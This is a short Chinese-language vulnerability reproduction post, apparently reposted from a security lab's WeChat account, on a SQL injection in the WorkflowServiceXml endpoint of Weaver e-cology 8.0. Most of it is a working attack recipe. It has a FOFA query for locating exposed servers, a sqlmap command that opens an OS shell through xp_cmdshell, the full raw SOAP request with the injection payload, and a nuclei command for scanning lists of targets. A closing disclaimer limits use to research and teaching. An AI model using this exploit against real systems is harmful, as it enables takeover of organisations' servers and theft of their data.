0x02 漏洞描述
泛微新一代移动办公平台e-cology8.0不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology v8.0平台WorkflowServiceXml处存在sql注入漏洞,攻击者通过漏洞可以获取服务器权限。
0x03 漏洞复现
fofa:app="泛微-协同商务系统" && "ecology8"
1.将如下包放入sqlmap中,输入如下sqlmap命令即可获取权限
sqlmap命令(DBA权限可调用xp_cmdshell进行命令执行):
python sqlmap.py -r 1.txt --random-agent --batch --os-shell
数据包:
POST /services/WorkflowServiceXml HTTP/1.1
Cookie: ecology_JSessionid=aaaBARi23vekqguNfrVDy
Host: {{Hostname}}
Content-Type: text/xml;charset=UTF-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050920 Firefox/1.0.6
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:getUserId>
<web:string>loginId = ? ;*--</web:string>
<web:string>xx</web:string>
</web:getUserId>
</soapenv:Body>
</soapenv:Envelope>
2.nuclei验证已发表于知识星球
nuclei.exe -t fanwei-ecology-v8-workflowservicexml-sqli -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):漏洞复现 泛微e-cology V8 WorkflowServiceXml SQL注入(另一种利用方式)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论